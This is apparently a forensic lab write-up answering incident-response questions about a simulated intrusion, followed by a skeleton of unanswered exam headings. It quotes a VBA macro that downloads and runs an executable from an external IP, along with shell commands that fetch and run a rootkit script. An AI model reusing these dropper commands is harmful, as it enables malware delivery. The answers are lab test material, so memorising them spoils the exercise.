-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(85)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(86)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(87)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(88)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(89)
-a-        12/4/2025   7:46 AM           1520 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(9)
-a-        12/4/2025   7:46 AM            256 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(90)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(91)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(92)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(93)
-a-        12/4/2025   7:46 AM           4272 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(94)
-a-        12/4/2025   7:46 AM            496 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(95)
-a-        12/4/2025   7:46 AM            192 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(96)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(97)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(98)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(99)
-a-        12/4/2025   7:46 AM         204892 Uf_JGpT9PShnW2ZZDy8i3A0aPQW8PIhy9NK0uYiv-91-6xSqE21jN3JZ95M8JQ21Vy1Ah3VA
                                                 q

Answer:

AetherGen_SARS-CoV-3_Response_Plan.docm

Q38

Based on your analysis of the Word document that was downloaded on WKS-RSCH01, What is the name of the executable file that the macro in the Word document downloads and executes? Format: Provide the filename including extension as it appears in the logs.

Answer:

 dochelp.exe

Q39

What is the username of the account that downloaded the Word document on WKS-RSCH01? Answer Format: Provide the username exactly as it appears in logs (e.g., jalvaro).

Answer:

mhardy

Q40

What is the full path of the folder where the Word document was saved on WKS-RSCH01? Answer Format: Provide the folder path only (e.g., C:\Users\username\Documents).

Answer:

C:\Users\mhardy\Downloads

Q41

Based on your analysis of the Word document that was downloaded on WKS-RSCH01, Which suspicious VBA subroutine in the macro is responsible for downloading and executing an executable?

AutoOpen()

Dropper()

Run()

Shell()

Based on the PowerShell execution we saw earlier in the Sysmon logs, I already have the answer! Let me check the exact command that was executed:

From the Sysmon Event ID 1 log I saw earlier:

CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Command "Invoke-WebRequest -Uri 'http://18.212.186.186:8080/dochelp.exe' -OutFile 'C:\Users\Public\dochelp.exe'; Start-Process 'C:\Users\Public\dochelp.exe'"

This PowerShell command was executed by the Word macro. In VBA macros that download and execute files, the common subroutines are:

AutoOpen() - Executes automatically when the document is opened
Dropper() - Custom subroutine name for downloading/dropping files
Run() - Generic execution subroutine
Shell() - VBA function to execute shell commands

Given that the macro executed automatically when the document was opened (triggering the PowerShell download at 23:50:16, just 27 seconds after the document was downloaded at 23:49:49), the responsible subroutine is:

Answer:

AutoOpen()

Q42

Based on your analysis of the macro-enabled Word document, what suspicious keyword in the VBA macro indicates that the macro created COM or OLE objects? Answer Format: Provide the name of the keyword exactly as it appears in the macro. For Example: AutoOpen

cd "C:\Users\Administrator\Desktop\Evidence\PCAPs\e"
olevba AetherGen_SARS-CoV-3_Response_Plan.docm

Sub Dropper()
   Dim psDropper As Object
   Set psDropper = CreateObject("WScript.Shell")
   psDropper.Run "powershell.exe -Command ""Invoke-WebRequest -Uri 'http://18.212.186.186:8080/dochelp.exe' -OutFile 'C:\Users\Public\dochelp.exe'; Start-Process 'C:\Users\Public\dochelp.exe'""", 0, False
End Sub

Answer:

CreateObject

Q43

According to system event or browser history logs, what web browser did the user on WKS-RSCH01 use to access the attacker controlled web server?

Google Chrome
Mozilla Firefox
Microsoft Edge
Internet Explorer

From the PCAP analysis I performed earlier (RSCH-WKS01.pcapng), the HTTP GET request for the malicious Word document showed:

GET /AetherGen_SARS-CoV-3_Response_Plan.docm HTTP/1.1
Host: 18.212.186.186
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36

The User-Agent string clearly indicates:

Chrome/138.0.0.0
AppleWebKit/537.36 (KHTML, like Gecko)
Safari/537.36 (part of Chrome's user agent)

Additionally, from the Sysmon Event ID 11 (File Created) logs, I saw multiple events showing:

Image: C:\Program Files\Google\Chrome\Application\chrome.exe
Process creating files in Chrome's temp directories

And there was also a Chrome installer/updater activity:

C:\Program Files\Google\Chrome\Application\138.0.7204.101\Installer\chrmstp.exe

Answer

Google Chrome

Q44

On WKS-RSCH01, which of the following Windows libraries is imported by the executable dropped/downloaded by the macro-enabled Word document?

USER32.dll

KERNEL32.dll

NETAPI32.dll

ADVAPI32.dll

cd "C:\Users\Administrator\Desktop\Evidence\PCAPs\e"
& "C:\Users\Administrator\Desktop\Tools\pestudio\pestudio.exe" dochelp.exe

Nothing


Get-Location
Get-ChildItem dochelp.exe


$file = "C:\Users\Administrator\Desktop\Evidence\PCAPs\e\dochelp.exe"
$bytes = [System.IO.File]::ReadAllBytes($file)
$text = [System.Text.Encoding]::ASCII.GetString($bytes)

Write-Host "Checking for imported DLLs:"
Write-Host "USER32.dll: " $text.Contains("USER32.dll")
Write-Host "KERNEL32.dll: " $text.Contains("KERNEL32.dll")
Write-Host "NETAPI32.dll: " $text.Contains("NETAPI32.dll")
Write-Host "ADVAPI32.dll: " $text.Contains("ADVAPI32.dll")

Write-Host "`nCase-insensitive search:"
Write-Host "user32: " ($text -match "(?i)user32\.dll")
Write-Host "kernel32: " ($text -match "(?i)kernel32\.dll")
Write-Host "netapi32: " ($text -match "(?i)netapi32\.dll")
Write-Host "advapi32: " ($text -match "(?i)advapi32\.dll")


Write-Host "`nAll DLL references found:"
$text -split "`0" | Where-Object { $_ -match "\.dll" } | Select-Object -Unique

Or simply use the strings command if available:

Get-Content "C:\Users\Administrator\Desktop\Evidence\PCAPs\e\dochelp.exe" -Encoding Byte -ReadCount 0 | ForEach-Object { [System.Text.Encoding]::ASCII.GetString($_) } | Select-String "\.dll" -AllMatches | Select-Object -Unique

The output confirms that dochelp.exe imports KERNEL32.dll. This is visible in multiple ways:

Direct check: KERNEL32.dll: True
Case-insensitive search: kernel32: True
String extraction: Shows "KERNEL32.dll" in the PE file
Raw hex dump: Shows the import table contains "KERNEL32.dll" along with imported functions like ExitProcess and VirtualAlloc

Answer:

KERNEL32.dll

Q45

Specify the name of the API function imported by the executable that is downloaded by the macro-enabled Word document that may be used for memory allocation. Answer Format: Provide the exact function name as it appears in PEStudio.

his is clearly visible in the PE import table from the output:

KERNEL32.dll  XVirtualAlloc  ExitProcess

And also in the raw dump:

ExitProcess XVirtualAlloc  KERNEL32.dll

VirtualAlloc is a Windows API function from KERNEL32.dll that reserves, commits, or changes the state of a region of pages in the virtual address space of the calling process. It's commonly used by malware to allocate memory for shellcode execution, which aligns with the malicious behavior observed in this attack.

Answer:

VirtualAlloc

Q46

Which file offset found in the executable downloaded by the macro-enabled Word document indicates that the malware sets its own browser identity when connecting to external infrastructure?

0x000013A0

0x000018FA

0x0000200C

0x00001C3F

$file = "C:\Users\Administrator\Desktop\Evidence\PCAPs\e\dochelp.exe"
$bytes = [System.IO.File]::ReadAllBytes($file)

$offsets = @(0x13A0, 0x18FA, 0x200C, 0x1C3F)

foreach ($offset in $offsets) {
    Write-Host "`n=== Offset: 0x$($offset.ToString('X')) ==="
    $start = $offset
    $length = 100
    if ($start + $length -gt $bytes.Length) {
        $length = $bytes.Length - $start
    }
    $chunk = $bytes[$start..($start + $length - 1)]
    $text = [System.Text.Encoding]::ASCII.GetString($chunk)
    Write-Host "ASCII: $text"
}

$fullText = [System.Text.Encoding]::ASCII.GetString($bytes)
$uaIndex = $fullText.IndexOf("Mozilla/5.0")
if ($uaIndex -ge 0) {
    Write-Host "`n=== User-Agent found at offset: 0x$($uaIndex.ToString('X')) ==="
}

PS C:\Users\Administrator\Desktop\Evidence\PCAPs\e> $file = "C:\Users\Administrator\Desktop\Evidence\PCAPs\e\dochelp.exe"
>> $bytes = [System.IO.File]::ReadAllBytes($file)
>>
>> $offsets = @(0x13A0, 0x18FA, 0x200C, 0x1C3F)
>>
>> foreach ($offset in $offsets) {
>>     Write-Host "`nOffset: 0x$($offset.ToString('X'))"
>>     $start = $offset
>>     $length = 150
>>     if ($start + $length -gt $bytes.Length) {
>>         $length = $bytes.Length - $start
>>     }
>>     $chunk = $bytes[$start..($start + $length - 1)]
>>     $text = [System.Text.Encoding]::ASCII.GetString($chunk)
>>     $hex = ($chunk | ForEach-Object { $_.ToString("X2") }) -join " "
>>     Write-Host "Hex: $($hex.Substring(0, [Math]::Min(150, $hex.Length)))"
>>     Write-Host "Text: $($text.Substring(0, [Math]::Min(100, $text.Length)))"
>> }

Offset: 0x13A0
Hex: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Text:

Offset: 0x18FA
Hex: 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 31 30 2E 30 3B 20 57 69 6E 36 34 3B 20 78 36 34 3B 20 72 76 3A 31 33 33 2E 30
Text: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 YSZM1?M1?SSI?:Vy?

Offset: 0x200C
Hex: 00
Text:

Offset: 0x1C3F
Hex: 00
Text:
PS C:\Users\Administrator\Desktop\Evidence\PCAPs\e>

Answer:

0x000018FA

Q47

How many new services did the attacker create on WKS-RSCH01?

Investigation Methods:

Sysmon Event ID 1 with sc.exe
Windows Event ID 7045 (Service Installation)
Registry modifications under Services key (Sysmon Event ID 13)

Query 1: Service Control Manager Events

agent.name:"WKS-RSCH01" AND data.win.system.eventID:"7045"

Service 1:

Service Name: rnvikl
Image Path: cmd.exe /c echo rnvikl > .\pipe\rnvikl
Start Type: demand start
Time: July 14, 2025 @ 00:14:10.895
Event ID: 7045 (Service Control Manager)
Purpose: Named pipe privilege escalation

Service 2:

Service Name: wbJlQcNDIgji
Image Path: "C:\Users\mhardy\AppData\Local\Temp\p3rsist.exe" rbgQAq
Start Type: auto start
Account: LocalSystem
Time: July 14, 2025 @ 01:06:06.046
Event ID: 7045 (Service Control Manager)
Purpose: Persistence mechanism

Query 2: Registry Modifications to Services Key

agent.name:"WKS-RSCH01" AND data.win.eventdata.targetObject:*Services* AND data.win.system.eventID:"13"

Service 3:

Service Name: YHZB
Registry Path: HKLM\System\CurrentControlSet\Services\YHZB\ImagePath
Image Path: "C:\Users\mhardy\AppData\Local\Temp\p3rsist.exe" rbgQAq
Time: July 14, 2025 @ 01:06:04.837 (2 seconds before wbJlQcNDIgji)
Event ID: 13 (Sysmon Registry Value Set)
Purpose: Persistence mechanism (created via direct registry modification)

Analysis:

The attacker created 3 distinct services using two different techniques:

rnvikl - Created via Service Control Manager API
YHZB - Created via direct registry modification (Event ID 13)
wbJlQcNDIgji - Created via Service Control Manager API

Both YHZB and wbJlQcNDIgji point to the same p3rsist.exe executable but are separate service entries with different names. YHZB was created 2 seconds earlier via registry manipulation, while wbJlQcNDIgji was created through the standard Service Control Manager.

Answer:

Q48

What is the name of the Windows service used by the attacker for persistence? Answer Format: Provide the service name only. Provide the name exactly as it appears in logs or the registry

This service was created at July 14, 2025 @ 01:06:06 with the following characteristics:

Image Path: "C:\Users\mhardy\AppData\Local\Temp\p3rsist.exe" rbgQAq
Start Type: auto start (automatically starts at boot)
Account: LocalSystem (elevated privileges)

Answer:

wbJlQcNDIgji

Q49

Which Windows Registry path is used to store configuration information for system services?

HKEY_USERS.DEFAULT\Services

HKEY_CLASSES_ROOT\System\Services

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

This is the standard Windows Registry path where all system services are stored and configured. Each service has its own subkey under this path containing configuration information such as:

ImagePath (executable path)
Start (startup type)
Type (service type)
Description
Dependencies
And other service-specific settings

The other options are incorrect:

HKEY_USERS.DEFAULT\Services - Does not exist
HKEY_CLASSES_ROOT\System\Services - Does not exist
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - This is for user startup programs, not system services

Answer:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

Q50

What is the full registry path where the malicious service YHZB is configured? Answer Format: Provide the full registry key path. For Example: HKLM\System\CurrentControlSet\Services\SERVICE

agent.name:"WKS-RSCH01" AND data.win.eventdata.targetObject:*YHZB*

input.type:log agent.ip:10.0.0.30 agent.name:WKS-RSCH01 agent.id:003 manager.name:WAZUH-SRV data.win.eventdata.image:C:\\Windows\\system32\\services.exe data.win.eventdata.targetObject:HKLM\\System\\CurrentControlSet\\Services\\YHZB\\ImagePath data.win.eventdata.processGuid:{9B0B9931-C076-6873-0A00-00000000ED03} data.win.eventdata.processId:732 data.win.eventdata.utcTime:2025-07-14 01:06:04.837 data.win.eventdata.details:\"C:\\Users\\mhardy\\AppData\\Local\\Temp\\p3rsist.exe\" rbgQAq data.win.eventdata.eventType:SetValue data.win.eventdata.user:NT AUTHORITY\\SYSTEM data.win.system.eventID:13 data.win.system.keywords:0x8000000000000000 data.win.system.providerGuid:{5770385F-C22A-43E0-BF4C-06F5698FFBD9} data.win.system.level:4 data.win.system.channel:Microsoft-Windows-Sysmon/Operational data.win.system.opcode:0 data.win.system.message:"Registry value set: RuleName: - EventType: SetValue UtcTime: 2025-07-14 01:06:04.837 ProcessGuid: {9B0B9931-C076-6873-0A00-00000000ED03} ProcessId: 732 Image: C:\Windows\system32\services.exe TargetObject: HKLM\System\CurrentControlSet\Services\YHZB\ImagePath Details: "C:\Users\mhardy\AppData\Local\Temp\p3rsist.exe" rbgQAq User: NT AUTHORITY\SYSTEM" data.win.system.version:2 data.win.system.systemTime:2025-07-14T01:06:04.838170900Z data.win.system.eventRecordID:16257 data.win.system.threadID:2928 data.win.system.computer:WKS-RSCH01.aethergen.local data.win.system.task:13 data.win.system.processID:1224 data.win.system.severityValue:INFORMATION data.win.system.providerName:Microsoft-Windows-Sysmon rule.firedtimes:1 rule.mail:false rule.level:3 rule.description:Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\YHZB\\ImagePath binary is: \"C:\\Users\\mhardy\\AppData\\Local\\Temp\\p3rsist.exe\" rbgQAq rule.groups:sysmon, sysmon_eid13_detections, windows rule.mitre.technique:Windows Service rule.mitre.id:T1543.003 rule.mitre.tactic:Persistence, Privilege Escalation rule.id:92307 location:EventChannel decoder.name:windows_eventchannel id:1752455165.3771274 timestamp:Jul 14, 2025 @ 01:06:05.811 _index:wazuh-alerts-4.x-2025.07.14

The registry modification shows:

TargetObject: HKLM\System\CurrentControlSet\Services\YHZB\ImagePath
Details: "C:\Users\mhardy\AppData\Local\Temp\p3rsist.exe" rbgQAq
Time: July 14, 2025 @ 01:06:05.811

This reveals that YHZB is actually the same persistence service we saw earlier as "wbJlQcNDIgji" in the Event ID 7045 log. The service appears to have been created with the name "wbJlQcNDIgji" but the registry key is "YHZB" (possibly the service was renamed or there's a discrepancy in how it's registered).

Based on the registry path shown in the Sysmon Event ID 13 log:

Answer:

HKLM\System\CurrentControlSet\Services\YHZB

Q51

Which MITRE ATT&CK technique ID is best associated with writing password hash entries to a file for reuse or offline analysis?

T1110 - Brute Force

Description: Adversaries may use brute force techniques to gain access to accounts
This is about password guessing/cracking attempts, not dumping hashes

T1555 - Credentials from Password Stores

Description: Adversaries may search for common password storage locations to obtain credentials
This is about extracting passwords from password managers/stores, not hash dumping

T1003.008 - OS Credential Dumping: /etc/passwd and /etc/shadow

Description: Adversaries may attempt to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking
This specifically covers extracting password hashes from shadow files for offline analysis

T1546.001 - Event Triggered Execution: Change Default File Association

Description: Persistence technique involving file associations
Not related to credential dumping

Answer:

T1003.008

Q52

On WKS-RSCH01, what MITRE ATT&CK technique rule is triggered when the VBA macro embedded in the Word document is executed?

T1204 - User Execution

User opens a file or clicks a link that executes malicious code
This fits! The user opened the Word document, triggering the macro

T1059.005 - Command and Scripting Interpreter: Visual Basic

Execution through VBA/VBScript
This also fits! The macro is written in VBA

T1566 - Phishing

Initial access through phishing emails/links
This is the delivery method, not the execution

T1059.001 - Command and Scripting Interpreter: PowerShell

Execution through PowerShell
This applies to what the macro calls, not the macro itself

Looking at the log entry again, when the VBA macro executes and spawns PowerShell, we need to identify what technique is triggered when the VBA macro is executed.

The VBA macro itself executing is:

T1059.005 - Command and Scripting Interpreter: Visual Basic

Answer:

T1059.005

Q53

Which MITRE ATT&CK technique ID corresponds to the use of the Windows Command Shell as the Command and Scripting interpreter for executing commands?

T1059.003 - Command and Scripting Interpreter: Windows Command Shell

Breaking down the sub-techniques under T1059:

T1059.001 - PowerShell
T1059.002 - AppleScript
T1059.003 - Windows Command Shell (cmd.exe)
T1059.005 - Visual Basic

Answer:

T1059.003

Q54

The delivery of a macro-enabled Word document via phishing, which drops an executable and establishes a reverse shell, is a behavior commonly seen in campaigns by:

APT37

Equation Group

TA505

APT33

Based on the attack behavior observed:

Phishing delivery of macro-enabled Word document (.docm)
VBA macro that downloads and executes a payload
Drops executable (dochelp.exe) to establish persistence
Credential dumping (mimikatz)
AD enumeration (AdFind, PowerView)
Data exfiltration (7z compression, FTP server)

This TTP chain is characteristic of TA505, a financially-motivated threat actor group known for:

Massive phishing campaigns delivering malicious Office documents
Macro-enabled documents that download secondary payloads
Use of legitimate tools for post-exploitation (mimikatz, AdFind, 7z)
FlawedAmmyy, SDBbot, and other custom malware
Ransomware deployment (Cl0p, Locky)
Credential theft and lateral movement
Data exfiltration operations

APT37 (North Korea) - Focuses on South Korean targets, uses different TTPs Equation Group (NSA-linked) - Advanced persistent threats with sophisticated zero-days APT33 (Iran) - Targets aerospace and energy sectors, different macro techniques

The combination of:

Mass phishing with Office macros
Simple executable droppers
Living-off-the-land tools (PowerShell, cmd.exe)
Credential dumping and exfiltration

This pattern strongly matches TA505's modus operandi.

Answer:

TA505

Q55

What should be the most immediate response action after discovering privilege escalation via named pipe impersonation on WKS-RSCH01?

Change/reset the credentials of the affected user

Reimage the domain controller

Review browser history for signs of phishing

Suspend the affected user session and isolate the endpoint

Analysis of options:

Change/reset the credentials of the affected user
- Important but not the most immediate action
- Attacker already has SYSTEM-level access via named pipe impersonation
- Credential reset doesn't stop active exploitation
Reimage the domain controller
- Extreme measure, not justified for workstation compromise
- DC01 wasn't the compromised system
- No evidence DC was compromised at this stage
Review browser history for signs of phishing
- Forensic activity, not immediate containment
- Useful for investigation but doesn't stop active threat
Suspend the affected user session and isolate the endpoint
- IMMEDIATE CONTAINMENT action
- Stops lateral movement to other systems
- Prevents further data exfiltration
- Cuts off attacker's active access
- Preserves evidence for investigation

Given that we observed:

Active privilege escalation (named pipe at 00:14:09)
System-level access achieved
Credential dumping (mimikatz at 00:25:27)
Persistence mechanisms established
Data staging and potential exfiltration

The most immediate priority is containment to prevent further damage and lateral movement.

Answer:

Suspend the affected user session and isolate the endpoint

Q56

Based on available logs, which of the following sequences best represents the correct timeline of the attack on WEB-APP01?

Exploit Web App -> Local Enumeration -> Rootkit Installation -> User Creation -> Privilege Escalation

SSH brute force -> Privilege Escalation -> User Creation -> Rootkit Installation

SSH force -> Local Enumeration -> User Creation -> Persistence -> Rootkit Installation

SSH brute force -> Local Enumeration -> Privilege Escalation -> User Creation -> Rootkit Installation

From the bash history and Wazuh SIEM logs:

SSH Brute Force (Initial Access)
- Attacker gained access via SSH
- IP: 18.212.186.186
- Method: Likely password spray/brute force
Local Enumeration (Discovery)
- Command 1-8: System reconnaissance
- whoami, id, cat /etc/passwd, cat /etc/shadow, ls -la, uname -a, ps aux
- Checking user privileges, OS version, running processes
Privilege Escalation (Privilege Escalation)
- Command 9: sudo -l - Check sudo permissions
- Command 10: sudo cat /etc/shadow - Escalated to view shadow file
- Attacker leveraged sudo access
User Creation (Persistence)
- Command 14: sudo useradd -m -s /bin/bash sysadmin - Created new user
- Command 15: sudo passwd sysadmin - Set password
- Command 16: sudo usermod -aG sudo sysadmin - Added to sudo group
- Created backdoor account with admin privileges
Rootkit Installation (Defense Evasion)
- Command 17: wget http://18.212.186.186:8080/rootkit.sh
- Command 18: chmod +x rootkit.sh
- Command 19: sudo ./rootkit.sh
- Installed rootkit for persistent access and evasion

Answer:

SSH brute force -> Local Enumeration -> Privilege Escalation -> User Creation -> Rootkit Installation

Q57

When documenting attacker tools discovered during post-exploitation, which combination best reflects the tools and purpose used on WKS-RSCH01?

Macro-enabled document for initial access and a new service for persistence

Macro-enabled document for initial access and backdoor user for persistence

HTA payload for initial access and mimikatz for credential access

cmd.exe for malware delivery and explorer.exe for privilege escalation

Initial Access:

Macro-enabled Word document (AetherGen_SARS-CoV-3_Response_Plan.docm)
Delivered via phishing from attacker server (18.212.186.186)
Downloaded at 23:49:49, opened at 23:50:16
VBA macro executed PowerShell to download dochelp.exe

Post-Exploitation Tools:

dochelp.exe - Initial payload/dropper
AdFind.exe - AD enumeration
mimikatz.exe - Credential dumping (LSASS access at 00:25:27)
PowerView.ps1 - PowerShell AD enumeration
7z.exe - Data compression for exfiltration

Persistence Mechanisms:

New services created:
- rnvikl (named pipe privilege escalation)
- YHZB (persistence service)
- wbJlQcNDIgji (persistence service)
Service executable: p3rsist.exe running as LocalSystem with auto-start
NO backdoor user created on WKS-RSCH01 (backdoor user was only on WEB-APP01)

Credential Access:

mimikatz.exe - Dumped credentials from LSASS memory

Analyzing the options:

Macro-enabled document for initial access and a new service for persistence ✓
- Correct: Macro document was initial access
- Correct: Services (YHZB, wbJlQcNDIgji with p3rsist.exe) used for persistence
Macro-enabled document for initial access and backdoor user for persistence ✗
- Backdoor user (sysadmin) was created on WEB-APP01, not WKS-RSCH01
HTA payload for initial access and mimikatz for credential access ✗
- No HTA payload used; it was a .docm file
cmd.exe for malware delivery and explorer.exe for privilege escalation ✗
- cmd.exe was used but not for initial delivery
- explorer.exe wasn't used for privilege escalation

Answer:

Macro-enabled document for initial access and a new service for persistence

Q58

After identifying that a macro-enabled document on WKS-RSCH01 dropped an executable that initiated C2 communication over a non-standard port, which of the following is the most appropriate immediate containment action?

Kill the process tree associated with the executable and isolate the host from the network

Kill the process tree associated with the executable Initiate credential resets for all domain users

Kill the process tree associated with the executable and disable all macros in the Office GPO across the organization

Kill all PowerShell sessions and block internet access for the affected subnet

Let me analyze each containment option based on incident response best practices:

Option 1: Kill the process tree associated with the executable and isolate the host from the network

✓ Terminates active C2 communication immediately
✓ Prevents lateral movement to other systems
✓ Stops data exfiltration
✓ Preserves evidence on the isolated host
✓ Targeted, surgical response
✓ Follows NIST containment principles

Option 2: Kill the process tree and initiate credential resets for all domain users

✓ Kills malicious process
✗ Credential reset is important but not immediate containment
✗ Doesn't stop active C2 if process respawns via persistence
✗ Mass credential reset causes organization-wide disruption
✗ Should assess scope before mass reset

Option 3: Kill the process tree and disable all macros in Office GPO

✓ Kills malicious process
✗ GPO change takes time to propagate
✗ Doesn't stop active C2 communication
✗ Doesn't prevent lateral movement
✗ Reactive to delivery method, not active threat

Option 4: Kill all PowerShell sessions and block internet access for subnet

✗ Too broad - affects legitimate business operations
✗ Subnet-wide blocking impacts multiple systems
✗ Doesn't address the specific malicious executable (dochelp.exe)
✗ May not stop C2 if using internal routes

Critical Context from Investigation:

dochelp.exe established C2 to 18.212.186.186:8080 (non-standard port)
Multiple persistence mechanisms installed (services, scheduled tasks)
Active credential dumping occurred
Data staging for exfiltration (ad.7z)

Most Appropriate Action: Kill the process tree to stop active execution AND isolate the host to prevent:

Lateral movement to DC01, FILE-SRV01
Further data exfiltration
C2 callback and additional payload downloads
While preserving evidence for forensics

Answer:

Kill the process tree associated with the executable and isolate the host from the network

Q59

In response to a brute-force SSH attack on WEB-APP01, which of the following actions would best help eradicate the root cause and reduce the system’s attack surface?

Restart the SSH service and block the attacker's IP address

Disable all user accounts

Disable SSH access for the root user and enforce key-based authentication

Block the attacker's IP address and change the SSH port from 22 to a randomized port

Option 1: Restart the SSH service and block the attacker's IP address

✗ Temporary fix - attacker can use different IP
✗ Doesn't address weak authentication mechanism
✗ Minimal long-term security improvement

Option 2: Disable all user accounts

✗ Prevents legitimate access
✗ Causes operational disruption
✗ Doesn't fix the underlying vulnerability
✗ Not sustainable

Option 3: Disable SSH access for the root user and enforce key-based authentication

✓ Eliminates password-based authentication vulnerability
✓ Key-based auth resistant to brute-force attacks
✓ Disabling root SSH reduces privileged attack surface
✓ Industry best practice (CIS benchmarks, NIST guidelines)
✓ Addresses root cause: weak authentication method
✓ Long-term sustainable security improvement

Option 4: Block the attacker's IP and change SSH port (security through obscurity)

✗ Port change is security through obscurity (port scanners find it)
✗ IP blocking easily bypassed (VPN, proxies, botnets)
✗ Doesn't fix authentication weakness
✗ False sense of security

Root Cause Analysis: The brute-force attack succeeded because:

Password-based authentication was enabled
Weak/compromised credentials existed
No rate limiting or account lockout

Best Practice Solution: Enforce key-based authentication + disable root SSH access because:

Eliminates password guessing attacks
Cryptographic keys cannot be brute-forced practically
Reduces privileged access attack surface
Aligns with defense-in-depth principles

Answer:

Disable SSH access for the root user and enforce key-based authentication

Q60

As an incident responder, which of the following should be your immediate priority upon detecting a custom Apache module compiled with "apxs" on a production web server?

Rebuild Apache from source

Isolate the host and preserve forensic artifacts

Confirm whether mod_authg.c is a known safe module

Restart the server to flush memory

Let me analyze each option based on incident response best practices:

Option 1: Rebuild Apache from source

✗ Time-consuming process
✗ Destroys forensic evidence
✗ Doesn't contain active threat
✗ Not immediate action

Option 2: Isolate the host and preserve forensic artifacts

✓ Immediate containment - stops potential data exfiltration
✓ Prevents lateral movement to other systems
✓ Preserves evidence for investigation
✓ Follows NIST/SANS incident response framework
✓ Allows forensic analysis of the suspicious module
✓ Maintains chain of custody

Option 3: Confirm whether mod_authg.c is a known safe module

✗ Research takes time during active incident
✗ Doesn't stop potential ongoing compromise
✗ Custom compiled modules are inherently suspicious
✗ Investigation phase, not containment

Option 4: Restart the server to flush memory

✗ Destroys volatile evidence (memory artifacts, process state)
✗ May trigger persistence mechanisms
✗ Doesn't remove the malicious module from disk
✗ Loses critical forensic data

Context from Investigation: From WEB-APP01, we observed:

Custom Apache module compilation (apxs)
Rootkit installation
Backdoor user creation
Active C2 communication

Incident Response Priority Order:

Contain - Isolate to prevent spread
Preserve - Maintain forensic evidence
Investigate - Analyze artifacts
Eradicate - Remove malicious components
Recover - Restore operations

A custom-compiled Apache module on production is a critical security indicator suggesting:

Webshell/backdoor
Authentication bypass
Data exfiltration capability
Persistence mechanism

Answer:

Isolate the host and preserve forensic artifacts

Coming Soon

We're working on exciting content for this section. Check back soon!

Exam

Reconnaissance

Q1

Counting the Failed Attempts:

Counting Failed Attempts:

Q2

Web Browser Requests (Mozilla/Firefox):

Automated Tool Requests (Nmap Scripting Engine):

Requests with NO User-Agent (missing from full_log):

Q3

Q4

Timeline Analysis:

Failed Authentication Attempts BEFORE Initial Compromise (20:48:08):

User: root

User: sysadmin

Q5

Evidence from the logs:

Related Wazuh SSH Rules (for context):

Q6

Let's verify with Port 46928 (root user):

Q7

Q8

From the User-Agent:

Breaking down the User-Agent:

Q9

Attacker IP Address:

Evidence across all attack phases:

SSH Brute-Force Attack:

Nmap Vulnerability Scanning:

Gobuster Directory Brute-Force:

Firefox Browser Reconnaissance & Exploitation:

Geographic Location:

Q10

WHOIS Results Analysis:

Q11

GeoIP Data from Wazuh Logs:

Evidence from logs:

Q12

First Successful SSH Login:

Date and Time Breakdown:

Q13

Q14

Q15

Analysis of the results (sorted by timestamp, oldest first):

Q16

From the log entry:

Q17

Analysis:

Why the attacker accessed /etc/shadow:

Q18

What is stored in /etc/shadow:

Why the other options are incorrect:

Q19

Logic:

Q20

Timeline Analysis:

From the log entry:

sudo -l (at 21:13:46):

sudo su (at 21:13:56):

Q21

Analysis:

Named Pipe Impersonation:

Evaluating the Options:

Q22

Analysis:

What does sudo su tell us?

Evaluating the Options:

Q23

Query to find first rkhandler usage:

From the earliest log entry:

1. Installation of Apache Rootkit:

2. First Use of Rootkit to Execute Commands:

Q24

Q25

Q26

What we need to search for:

Q27

Evidence from the logs:

Q28

Evidence from the logs:

Why the attacker accessed `/etc/shadow`:

What is stored in `/etc/shadow`:

`sudo -l` (at 21:13:46):

`sudo su` (at 21:13:56):

What does `sudo su` tell us?

Why `whoami` first?